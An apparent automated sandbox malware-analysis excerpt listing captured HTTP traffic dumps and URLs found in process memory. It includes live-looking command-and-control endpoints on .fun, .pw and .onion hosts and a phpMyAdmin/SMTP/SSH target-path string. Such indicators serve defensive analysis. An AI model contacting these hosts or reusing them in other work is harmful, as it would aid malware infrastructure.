fc e1 11 6d ad d5 d3 74 ca e4 f3 a3 c8 d5 dd f2 21 49 9e 2f fe 11 e1 a7 62 db 20 78 fc 1b 31 10 d6 c0 e4 b1 45 4b d0 8b 00 96 ed a8 64 07 9c 05 6a 74 80 80 fe 19 fd ac a8 7e 26 ae 7b be 5c 2e 97 f7 ab cd 66 51 fc c6 1d 6c c6 cf 20 08 3a a9 98 29 cc a4 6b 67 cd 81 6d bc 9d 63 97 d9 ca 3c b7 50 a4 20 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d5 d2 bb e0 14 41 c3 66 44 5d b3 3f 01 d2 20 5b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 b5 25 f4 16 09 56 2f 9d 71 9e ad c2 5a b1 75 04 c2 17 02 a7 32 46 58 18 bb 3c 0b d0 62 08 62 8f c0 e1 4a 72 0e 42 2b 8c 29 27 10 3a 94 5a 69 c9 4f 43 06 19 3e c9 54 8c fd 7c fe 09 76 03 61 98 fc 2f c8 5d b2 1b 1b 32 46 53 00 d7 1f d5 4e 5a 33 78 70 11 24 13 a5 93 89 32 39 53 93 0c d9 45 02 4d ec ac 63 26 1a 80 bc 96 07 be 39 50 9a 27 11 7a 4d b2 61 b4 31 58 67 44 c9 9e 3d e5 44 27 8d 50 ce 60 9b 88 5b 14 96 7d 3a 05 d2 45 1f f0 a8 32 8a 86 86 eb 7e 87 03 e1 11 24 da c0 ed d5 9c 12 6a 54 22 1a 9a 65 ad f5 7a 03 c2 f4 62 08 a7 a0 ef f1 23 73 22 31 ce ee 33 08 ad 8b fb 26 45 68 c5 81 b7 f5 fd 90 78 be 5d 37 24 c3 98 01 bd f3 07 e1 c7 cd e3 b9 1c 8b 08 ba ed 0c 7e 85 4e d4 e3 44 c7 09 e6 f3 a7 21 72 37 0d af c8 4e ef 39 6d 3b ee b1 d1 ac 38 ee 2e cb 77 31 34 5c 6e 06 b9 b4 46 69 35 94 7e 46 68 78 cd 53 62 c1 1d 53 8f 86 5f 8d 23 86 56 5b dd c6 f6 98 ff ee ad c7 71 6e 3c 26 7c 11 92 cc 00 7d 6a 7b 70 f1 8c a3 7b 14 b5 3e a5 f7 7a df 10 ff 4b 7d a6 e0 9f f2 15 cf fd b9 60 00 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25eeSk0_qK_n$vM(E>"I{2},zuvY-.>^GE[W.7+h<owOdtBXmt!I/b x1EKdjt~&{\.fQl :)kgmc<P LUSAfD]? [}E%%V/qZu2FX<bbJrB+)':ZiOC>T\|va/]2FSNZ3xp$29SEMc&9P'zMa1XgD=D'P`[}:E2~$jT"ezb#s"13&Ehx]7$~ND!r7N9m;8.w14\nFi5~FhxSbS_#V[qn<&\|}j{p{>zK}`0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: aruba-proxyDate: Fri, 22 Dec 2023 20:15:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.covicol.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 61 36 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 72 db 48 b2 e0 73 3b 62 ff a1 0c c7 58 d2 0c 41 02 bc 53 96 d4 a3 96 ed 6e c7 fa b6 b6 ba 67 cf d8 0e 46 11 28 92 65 83 00 1a 00 29 c9 1e 47 6c ec 2f ec 0f 9c c7 7d d8 a7 f3 b6 af 3b 7f 72 be 64 33 ab 0a 40 01 04 45 ea e6 56 4f cb 17 09 a8 ca ca 5b 65 65 65 5d b1 77 ff f1 ab a3 e3 7f 7b fd 84 4c 93 99 77 70 6f 0f 7f 11 97 47 fb 86 97 44 06 f1 a8 3f d9 37 78 62 3e 3b 36 ee 7d 17 46 6c cc 4f f7 8d 60 b2 0b f0 49 18 ef 36 1a c1 24 ac cf 58 c3 8f 1f 18 04 cb 33 ea 1e dc fb 6e 6f c6 12 4a 9c 29 8d 62 96 ec 1b 3f 1f 3f 35 fb 06 69 64 39 3e 9d b1 7d 63 c1 d9 49 18 44 89 41 9c c0 4f 98 0f 90 27 dc 4d a6 fb 2e 5b 70 87 99 e2 a5 46 b8 cf 13 4e 3d 33 76 a8 c7 f6 ed 1a 99 d1 53 3e 9b cf d2 04 85 d8 e3 fe 27 12 31 6f df 08 a3 60 cc 3d 66 90 29 30 bc 6f 20 ab c0 e9 64 16 4e ea 41 34 69 9c 8e fd 86 5d 51 8a fb 93 11 75 3e 95 8a 9d 9c 9c d4 9d 00 f8 09 3c f8 3d 6b 9c ce bc 28 74 ea e1 34 54 18 12 9e 78 ec e0 35 9d 70 1f 04 0b 7c 92 44 c1 82 82 90 0f 1f f4 9b b6 fd 88 1c bd aa ff f2 ac 7e f4 ea 39 79 fb e6 f9 5e 43 c2 df bb f7 dd 77 7b f7 4d 93 1c 7a 1e 48 48 5e f9 8c bc 7d f2 8a b4 eb cd ba 5d b7 89 69 1e 20 84 a6 ad 28 18 05 49 ac e9 ca 0f b8 ef b2 53 c9 c6 77 7b b1 13 f1 30 21 c9 59 08 c0 34 0c 3d ee d0 84 07 7e c3 73 ff f2 31 0e 7c 28 e9 d1 38 86 3c 1e c4 2c 00 ed 4d d9 8c 1a 58 f6 bb 2f c6 5f 05 da d3 c4 d8 35 64 d5 be 6f bc 6f 48 10 54 9a 51 33 fe 3a 89 68 38 35 76 df 01 30 12 01 c8 bf b1 d1 5b 9e 30 cc e4 ae 2a 29 0a 96 94 f6 be f1 e0 84 8d 62 09 3a 8f bc 73 41 01 04 05 06 98 82 e2 20 d9 65 52 46 10 0a 72 0f e1 95 2f 38 f9 81 c6 8c 1c 3a bf ce 69 8d 50 95 36 c2 b4 9f 82 84 bc 60 5e 52 4a 7e fd f3 9b 72 4a fd 6d fd b0 0e 04 b8 ff 1c 0c 7e 4e 27 48 5d 5a 7d cd 08 e7 23 8f c7 53 16 19 bb 5f d6 cb 09 ba a2 3e ff 2c 34 6f 7c fd 5a cb 95 f5 4a cf d9 40 63 41 11 7e 85 4e d6 6a 53 67 e1 87 08 9a a7 13 cd 67 a3 e7 3c 4e 36 60 02 ac fc c5 d9 a1 3b e3 3e 30 34 ca 4a 7b b2 34 d4 e7 0c 11 3d f1 d8 0c 2c b2 60 1a 98 fe 0c f2 37 20 f2 c0 cb 61 c3 00 ac 44 d4 af 2d f1 0b a5 e7 e6 f6 1a eb 66 3d ca 5c 5f 3f 05 33 b6 64 3a 99 12 eb 35 32 f7 df cf 9b 96 3d a0 9f 39 f3 5d 0a ce 0f 4a 42 d3 21 71 c8 1c 70 3b fc f3 67 6c cc 3e f3 88 43 67 61 40 5c e6 79 0c 5a 21 fe 84 06 38 8f 93 08 c1 ea 9b 55 86 e1 43 23 13 c2 6e ac f7 4c 3d 7a 55 5e 40 bf d5 c8 74 5d 37 af a2 6b 1d 7d ae f7 97 d0 f8 9e 06 73 df dd 40 2d 05 0c a0 22 e8 67 16 3c 98 c7 6b d5 a4 a9 e6 03 fc 45 2f d8 90 f5 7c b0 c2 bd a2 5b bd 97 3b fd 2d d7 8f 4d ec d6 58 e2 4c b7 a4 e3 df 6a 34 e6 31 ab 8f c1 1f d2 13 16 83 fd 20 b1 2d f4 b2 6b 0b c6 f5 13 f4 96 25 60 83 7a 09 8b 7c 0a ee
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:15:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Mon, 16 Oct 2023 04:34:27 GMTETag: W/"400-607cdebea636c"Content-Encoding: gzipData Raw: 32 35 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b b4 24 a3 81 76 1d 4d c6 28 a5 0c 45 3e c5 22 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba de de de 2c 8a ea 7a 75 b9 e4 db 76 bd bd 59 2d 2e 3e 5e c0 0f 47 f0 dd 45 5b 57 f3 fc b2 a8 ae 2e 37 2b 68 3c aa 6f e5 1c bd 77 fe 4f ed 64 98 97 8b ea c3 74 fa a8 15 18 42 58 af e0 cb d3 a2 9a a7 c3 fc e1 11 6d ad d5 d3 74 ca e4 f3 a3 c8 d5 dd f2 21 49 9e 2f fe 11 e1 a7 62 db 20 78 fc 1b 31 10 d6 c0 e4 b1 45 4b d0 8b 00 96 ed a8 64 07 9c 05 6a 74 80 80 fe 19 fd ac a8 7e 26 ae 7b be 5c 2e 97 f7 ab cd 66 51 fc c6 1d 6c c6 cf 20 08 3a a9 98 29 cc a4 6b 67 cd 81 6d bc 9d 63 97 d9 ca 3c b7 50 a4 20 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d5 d2 bb e0 14 41 c3 66 44 5d b3 3f 01 d2 20 5b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 b5 25 f4 16 09 56 2f 9d 71 9e ad c2 5a b1 75 04 c2 17 02 a7 32 46 58 18 bb 3c 0b d0 62 08 62 8f c0 e1 4a 72 0e 42 2b 8c 29 27 10 3a 94 5a 69 c9 4f 43 06 19 3e c9 54 8c fd 7c fe 09 76 03 61 98 fc 2f c8 5d b2 1b 1b 32 46 53 00 d7 1f d5 4e 5a 33 78 70 11 24 13 a5 93 89 32 39 53 93 0c d9 45 02 4d ec ac 63 26 1a 80 bc 96 07 be 39 50 9a 27 11 7a 4d b2 61 b4 31 58 67 44 c9 9e 3d e5 44 27 8d 50 ce 60 9b 88 5b 14 96 7d 3a 05 d2 45 1f f0 a8 32 8a 86 86 eb 7e 87 03 e1 11 24 da c0 ed d5 9c 12 6a 54 22 1a 9a 65 ad f5 7a 03 c2 f4 62 08 a7 a0 ef f1 23 73 22 31 ce ee 33 08 ad 8b fb 26 45 68 c5 81 b7 f5 fd 90 78 be 5d 37 24 c3 98 01 bd f3 07 e1 c7 cd e3 b9 1c 8b 08 ba ed 0c 7e 85 4e d4 e3 44 c7 09 e6 f3 a7 21 72 37 0d af c8 4e ef 39 6d 3b ee b1 d1 ac 38 ee 2e cb 77 31 34 5c 6e 06 b9 b4 46 69 35 94 7e 46 68 78 cd 53 62 c1 1d 53 8f 86 5f 8d 23 86 56 5b dd c6 f6 98 ff ee ad c7 71 6e 3c 26 7c 11 92 cc 00 7d 6a 7b 70 f1 8c a3 7b 14 b5 3e a5 f7 7a df 10 ff 4b 7d a6 e0 9f f2 15 cf fd b9 60 00 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25eeSk0_qK_n$vM(E>"I{2},zuvY-.>^GE[W.7+h<owOdtBXmt!I/b x1EKdjt~&{\.fQl :)kgmc<P LUSAfD]? [}E%%V/qZu2FX<bbJrB+)':ZiOC>T\|va/]2FSNZ3xp$29SEMc&9P'zMa1XgD=D'P`[}:E2~$jT"ezb#s"13&Ehx]7$~ND!r7N9m;8.w14\nFi5~FhxSbS_#V[qn<&\|}j{p{>zK}`0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: aruba-proxyDate: Fri, 22 Dec 2023 20:15:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.covicol.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 61 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 72 db 48 b2 e0 73 3b 62 ff a1 0c c7 58 d2 0c 41 02 bc 53 96 d4 a3 96 ed 6e c7 fa b6 b6 ba 67 cf d8 0e 46 11 28 92 65 83 00 1a 00 29 c9 1e 47 6c ec 2f ec 0f 9c c7 7d d8 a7 f3 b6 af 3b 7f 72 be 64 33 ab 0a 40 01 04 45 ea e6 56 4f cb 17 09 a8 ca ca 5b 65 65 65 5d b1 77 ff f1 ab a3 e3 7f 7b fd 84 4c 93 99 77 70 6f 0f 7f 11 97 47 fb 86 97 44 06 f1 a8 3f d9 37 78 62 3e 3b 36 ee 7d 17 46 6c cc 4f f7 8d 60 b2 0b f0 49 18 ef 36 1a c1 24 ac cf 58 c3 8f 1f 18 04 cb 33 ea 1e dc fb 6e 6f c6 12 4a 9c 29 8d 62 96 ec 1b 3f 1f 3f 35 fb 06 69 64 39 3e 9d b1 7d 63 c1 d9 49 18 44 89 41 9c c0 4f 98 0f 90 27 dc 4d a6 fb 2e 5b 70 87 99 e2 a5 46 b8 cf 13 4e 3d 33 76 a8 c7 f6 ed 1a 99 d1 53 3e 9b cf d2 04 85 d8 e3 fe 27 12 31 6f df 08 a3 60 cc 3d 66 90 29 30 bc 6f 20 ab c0 e9 64 16 4e ea 41 34 69 9c 8e fd 86 5d 51 8a fb 93 11 75 3e 95 8a 9d 9c 9c d4 9d 00 f8 09 3c f8 3d 6b 9c ce bc 28 74 ea e1 34 54 18 12 9e 78 ec e0 35 9d 70 1f 04 0b 7c 92 44 c1 82 82 90 0f 1f f4 9b b6 fd 88 1c bd aa ff f2 ac 7e f4 ea 39 79 fb e6 f9 5e 43 c2 df bb f7 dd 77 7b f7 4d 93 1c 7a 1e 48 48 5e f9 8c bc 7d f2 8a b4 eb cd ba 5d b7 89 69 1e 20 84 a6 ad 28 18 05 49 ac e9 ca 0f b8 ef b2 53 c9 c6 77 7b b1 13 f1 30 21 c9 59 08 c0 34 0c 3d ee d0 84 07 7e c3 73 ff f2 31 0e 7c 28 e9 d1 38 86 3c 1e c4 2c 00 ed 4d d9 8c 1a 58 f6 bb 2f c6 5f 05 da d3 c4 d8 35 64 d5 be 6f bc 6f 48 10 54 9a 51 33 fe 3a 89 68 38 35 76 df 01 30 12 01 c8 bf b1 d1 5b 9e 30 cc e4 ae 2a 29 0a 96 94 f6 be f1 e0 84 8d 62 09 3a 8f bc 73 41 01 04 05 06 98 82 e2 20 d9 65 52 46 10 0a 72 0f e1 95 2f 38 f9 81 c6 8c 1c 3a bf ce 69 8d 50 95 36 c2 b4 9f 82 84 bc 60 5e 52 4a 7e fd f3 9b 72 4a fd 6d fd b0 0e 04 b8 ff 1c 0c 7e 4e 27 48 5d 5a 7d cd 08 e7 23 8f c7 53 16 19 bb 5f d6 cb 09 ba a2 3e ff 2c 34 6f 7c fd 5a cb 95 f5 4a cf d9 40 63 41 11 7e 85 4e d6 6a 53 67 e1 87 08 9a a7 13 cd 67 a3 e7 3c 4e 36 60 82 ba 33 ee a3 ad 03 3f a3 ac b0 27 0b 43 75 ce 10 cf 13 8f cd c0 20 0b 96 81 e9 cf 20 7f 03 1a 0f bc 1c 36 0c c0 48 44 f5 da 12 bf d0 79 6e 6d af b1 6a d6 a3 cc d5 f5 53 30 63 4b 96 93 e9 b0 5e 23 73 ff fd bc 69 d9 03 fa 99 33 df a5 e0 fb a0 24 b4 1c 12 87 cc 01 af c3 3f 7f c6 b6 ec 33 8f 38 74 16 06 c4 65 9e c7 a0 11 e2 4f 68 7f f3 38 89 10 ac be 59 5d 18 3e b4 31 21 ec a6 6a cf b4 a3 57 e4 05 d4 5b 89 4b d7 74 f3 2a 9a d6 b0 e7 4a 7f 09 0d ef 69 30 f7 dd 0d 74 a2 23 00 f5 40 17 b3 e0 c1 3c 5e ab 22 4d 2f 1f e0 2f 3a c0 86 ac e3 83 15 9e 15 3d ea bd dc df 6f b9 7e 6c 62 8f c6 12 67 ba 25 7d fe 56 a3 31 8f 59 7d 0c ae 90 9e b0 18 6c 07 89 6d a1 83 5d 5b 30 ae 9f a0 a3 2c 01 1b d4 4b 58 e4 53 f0 7c 15 9e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: aruba-proxyDate: Fri, 22 Dec 2023 20:15:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.covicol.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 61 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 72 db 48 96 e0 73 39 62 ff 21 0d 47 5b 52 37 41 02 bc 53 96 54 ad 92 ed 2a c7 f8 36 b6 aa 7a 67 6c 07 23 09 24 c9 b4 41 00 05 80 94 64 b7 23 36 f6 17 f6 07 e6 71 1f f6 69 de f6 75 fb 4f e6 4b f6 9c cc 04 90 00 41 91 ba b9 54 5d f2 45 02 32 4f 9e 5b 9e 3c 79 f2 8a bd fb 8f 5f 1d 1d ff db eb 27 64 9a cc bc 83 7b 7b f8 8b b8 3c da 37 bc 24 32 88 47 fd c9 be c1 13 f3 d9 b1 71 ef bb 30 62 63 7e ba 6f 04 93 5d 80 4f c2 78 b7 d1 08 26 61 7d c6 1a 7e fc c0 20 58 9e 51 f7 e0 de 77 7b 33 96 50 e2 4c 69 14 b3 64 df f8 f9 f8 a9 d9 37 48 23 cb f1 e9 8c ed 1b 0b ce 4e c2 20 4a 0c e2 04 7e c2 7c 80 3c e1 6e 32 dd 77 d9 82 3b cc 14 2f 35 c2 7d 9e 70 ea 99 b1 43 3d b6 6f d7 c8 8c 9e f2 d9 7c 96 26 28 c4 1e f7 3f 91 88 79 fb 46 18 05 63 ee 31 83 4c 81 e1 7d 03 59 05 4e 27 b3 70 52 0f a2 49 e3 74 ec 37 ec 8a 52 dc 9f 8c a8 f3 a9 54 ec e4 e4 a4 ee 04 c0 4f e0 c1 ef 59 e3 74 e6 45 a1 53 0f a7 a1 c2 90 f0 c4 63 07 af e9 84 fb 20 58 e0 93 24 0a 16 14 84 7c f8 a0 df b4 ed 47 e4 e8 55 fd 97 67 f5 a3 57 cf c9 db 37 cf f7 1a 12 fe de bd ef be db bb 6f 9a e4 d0 f3 40 42 f2 ca 67 e4 ed 93 57 a4 5d 6f d6 ed ba 4d 4c f3 00 21 34 6d 45 c1 28 48 62 4d 57 7e c0 7d 97 9d 4a 36 be db 8b 9d 88 87 09 49 ce 42 00 a6 61 e8 71 87 26 3c f0 1b 9e fb 97 8f 71 e0 43 49 8f c6 31 e4 f1 20 66 01 68 6f ca 66 d4 c0 b2 df 7d 31 fe 2a d0 9e 26 c6 ae 21 ab f6 7d e3 7d 43 82 a0 d2 8c 9a f1 d7 49 44 c3 a9 b1 fb 0e 80 91 08 40 fe 8d 8d de f2 84 61 26 77 55 49 51 b0 a4 b4 f7 8d 07 27 6c 14 4b d0 79 e4 9d 0b 0a 20 28 30 c0 14 14 07 c9 2e 93 32 82 50 90 7b 08 af 7c c1 c9 0f 34 66 e4 d0 f9 75 4e 6b 84 aa b4 11 a6 fd 14 24 e4 05 f3 92 52 f2 eb 9f df 94 53 ea 6f eb 87 75 20 c0 fd e7 60 f0 73 3a 41 ea d2 ea 6b 46 38 1f 79 3c 9e b2 c8 d8 fd b2 5e 4e d0 15 f5 f9 67 a1 79 e3 eb d7 5a ae ac 57 7a ce 06 1a 0b 8a f0 2b 74 b2 56 9b 3a 0b 3f 44 d0 3c 9d 68 3e 1b 3d e7 71 b2 01 13 af a7 e1 8b b3 43 77 c6 7d 60 68 94 95 f6 64 69 a8 cf 19 22 7a e2 b1 19 58 64 c1 34 30 fd 19 e4 6f 40 e4 81 97 c3 86 01 58 89 a8 5f 5b e2 17 4a cf cd ed 35 d6 cd 7a 94 b9 be 7e 0a 66 6c c9 74 32 25 d6 6b 64 ee bf 9f 37 2d 7b 40 3f 73 e6 bb 14 9c 1f 94 84 a6 43 e2 90 39 e0 76 f8 e7 cf d8 98 7d e6 11 87 ce c2 80 b8 cc f3 18 b4 42 fc 09 0d 70 1e 27 11 82 d5 37 ab 0c c3 87 46 26 84 dd 58 ef 99 7a f4 aa bc 80 7e ab 91 e9 ba 6e 5e 45 d7 3a fa 5c ef 2f a1 f1 3d 0d e6 be bb 81 5a 0a 18 40 45 d0 cf 2c 78 30 8f d7 aa 49 53 cd 07 f8 8b 5e b0 21 eb f9 60 85 7b 45 b7 7a 2f 77 fa 5b ae 1f 9b d8 ad b1 c4 99 6e 49 c7 bf d5 68 cc 63 56 1f 83 3f a4 27 2c 06 fb 41 62 5b e8 65 d7 16 8c eb 27 e8 2d 4b c0 06 f5 12 16 f9 14
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:15:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:15:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:15:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:15:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:16:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Source: explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1682291427.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.g
Source: D217.exe, 00000008.00000003.1993451846.0000000003764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1682291427.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1682291427.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: D217.exe, 00000008.00000003.1993451846.0000000003764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: D217.exe, 00000008.00000003.2015110979.0000000001999000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2084386218.0000000001227000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2084253990.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2084386218.000000000122D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/
Source: D217.exe, 00000008.00000002.2062384038.0000000001999000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000003.2015110979.0000000001999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/(
Source: RegSvcs.exe, 00000010.00000002.2084386218.000000000122D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/88&
Source: D217.exe, 00000008.00000002.2062384038.0000000001999000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000003.2015110979.0000000001999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/J
Source: D217.exe, 00000008.00000002.2062384038.0000000001999000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000003.2015110979.0000000001999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/T
Source: D217.exe, 00000008.00000003.2015110979.0000000001999000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2084386218.0000000001227000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2084386218.000000000122D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/api
Source: D217.exe, 00000008.00000002.2062384038.0000000001999000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000003.2015110979.0000000001999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/api(a
Source: D217.exe, 00000008.00000003.2014983087.00000000019C1000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000002.2062477491.00000000019C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/api/apip
Source: D217.exe, 00000008.00000002.2062384038.0000000001999000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000003.2015110979.0000000001999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/apiza
Source: D217.exe, 00000008.00000003.2015110979.00000000019AF000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000002.2062384038.00000000019AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/ff-j0
Source: D217.exe, 00000008.00000003.2015110979.00000000019B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://diagramfiremonkeyowwa.fun/j
Source: D217.exe, 00000008.00000002.2062384038.0000000001999000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000003.2015110979.0000000001999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://neighborhoodfeelsa.fun/api
Source: explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1682291427.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1680983414.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: D217.exe, 00000008.00000003.1993451846.0000000003764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000001.00000000.1681551048.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1681904921.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1683716385.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: RegSvcs.exe, 00000010.00000002.2084253990.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tablesockartfinewa.pw/api
Source: RegSvcs.exe, 00000010.00000002.2084253990.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tablesockartfinewa.pw/apiA
Source: explorer.exe, 00000001.00000000.1684862545.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000824000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2
Source: explorer.exe, 00000001.00000000.1684862545.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
